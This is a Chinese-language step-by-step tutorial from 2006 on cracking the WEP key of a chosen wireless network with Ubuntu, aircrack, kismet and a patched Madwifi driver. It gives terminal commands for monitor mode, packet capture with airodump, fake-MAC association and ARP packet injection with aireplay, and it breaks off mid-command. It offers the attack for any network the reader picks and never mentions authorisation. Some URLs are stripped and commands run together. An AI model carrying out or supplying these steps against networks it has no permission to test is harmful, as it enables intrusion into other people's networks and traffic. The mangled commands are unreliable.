揭密秘笈用Ubuntu破解WEP密钥.doc

揭密秘笈：用Ubuntu破解WEP密钥作者: lvye, 出处:天极网,责任编辑: lvye, 2006-07-07 10:36看了这篇文章，任何人都可以安装和运行Linux，并破解WEP密钥。我一共花了整整两天，并阅读了大量资料才做出这个东西，现在拿出来和大家分享。看了这篇文章，任何人都可以安装和运行Linux，并破解WEP密钥。我一共花了整整两天，并阅读了大量资料才做出这个东西，现在拿出来和大家分享。我不是Linux方面的专家。你所需要的就是一个有无线网卡的旧笔记本和一份Ubuntu Linux的拷贝，这是目前最流行并且最易于安装的Linux发行版本之一。第一步，很显然，是安装Ubuntu。从CD启动，按指示操作，非常简单。要注意的是，接下来的每一步都要有序进行，否则就达不到预期目标。下一步是安装其它程序。首先要保证你的本本可以联网。安装其它程序，需要打开一个终端窗口，并键入如下代码:sudo cp /etc/apt/sources.list /etc/apt/sources.list_backupsudo gedit /etc/apt/sources.list在编辑器中，用以下代码代替其它东西:# Add comments (#) in front of any line to remove it from being checked. # Use the following sources.list at your own risk.deb /ubuntu dapper main restricted universe multiversedeb-src /ubuntu dapper main restricted universe multiverse# MAJOR BUG FIX UPDATES produced after the final releasedeb /ubuntu dapper-updates main restricted universe multiversedeb-src /ubuntu dapper-updates main restricted universe multiverse# UBUNTU SECURITY UPDATESdeb /ubuntu dapper-security main restricted universe multiversedeb-src /ubuntu dapper-security main restricted universe multiverse# BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)deb /ubuntu dapper-backports main restricted universe multiversedeb-src /ubuntu dapper-backports main restricted universe multiverse# PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)deb /ubuntu/plf dapper free non-freedeb-src /ubuntu/plf dapper free non-free保存文件、退出编辑器。敲入如下命令:sudo apt-get update现在我们可以安装后续将会用到的包了:sudo apt-get install build-essentialsudo apt-get install aircracksudo apt-get install kismetsudo apt-get install airsnortsudo apt-get install linux-sourcesudo apt-get install linux-headerssudo apt-get install sharutils接下来你应该更新整个系统，方法是，进入系统菜单AdministrationUpdate Manager。单击“Check”，开始安装更新。然后重启系统。完成后，为Madwifi驱动打补丁。这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动，我需要对之打补丁。如果你的驱动和我的不同，你需要研究一下是否需要为驱动打补丁，是否甚至可以和Aircrack套件协同工作。A的论坛是一个用来测试的好地方，当然了，google search也是的。如果你的网卡也是Atheros的，我们称之为ath0，那么，在终端窗口敲入iwconfig，会出现一行字符，显示以太网控制器是Atheros Communications我们来打补丁。当发现硬盘旧的驱动时，会暂时让你的无线网卡无法工作。先进入/usr/src目录，下载新的驱动、删掉老驱动，然后安装新驱动，并打上补丁。你可以把以下代码拷贝粘贴到终端:sudo -i cd /usr/srcwget /stuff/madwifi-cvs-20051025.tar.gzwget /stuff/madwifi-cvs-20051025.patchifconfig ath0 downrmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_halfind /lib/modules -name ath* -exec rm -v ;find /lib/modules -name wlan* -exec rm -v ;tar zxvf madwifi-cvs-20051025.tar.gzcd madwifipatch -Np1 -i ./madwifi-cvs-20051025.patchmake & make installmodprobe ath_pci如果你用的是Atheros驱动，接下来我们旧需要配置kismet了。如果你用的是其它驱动，就必须看你所使用的语法。首先进入Kismet配置，然后改变源代码行。sudo gedit /etc/kismet/kismet.conf把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”，重启计算机。重启后你将可以通过无线网卡访问英特网。现在我们开始破解。打开一个终端窗口，进入监控模式，运行ksimet。sudo airmon start ath0sudo kismet找到你想要破解的无线网络，需要注意其ESSID和通道，然后敲Ctrl-C退出。接下来运行airodump。sudo airodump ath0 filename channel# 1文件名随你意，可以作为ivs文件存在你的home目录下，或者存在你运行命令的任何目录下。从airodump中拷贝无线网络的bssid，具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口，以便我们可以运行aireplay，开始注入数据包，导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多，aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的，我们可能需要多达100万个数据包。sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0应该把网络和无线连接联系起来。如果总是超时，你需要离无线路由器更近，或通过“sudo iwconfig ath0 rate 1M”改变接口速率。接下来我们想开始注入数据包。sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0起初只是读取数据包，并且报告0个ARP请求、发送0个数据包。只需要等一两分钟，就会开始大量发送数据包了。如果返回文本，并报告说已经被削弱了，那么敲Ctrl+C，重新运行命令。可以通过敲入下面这条命令来加速任何事情:sudo air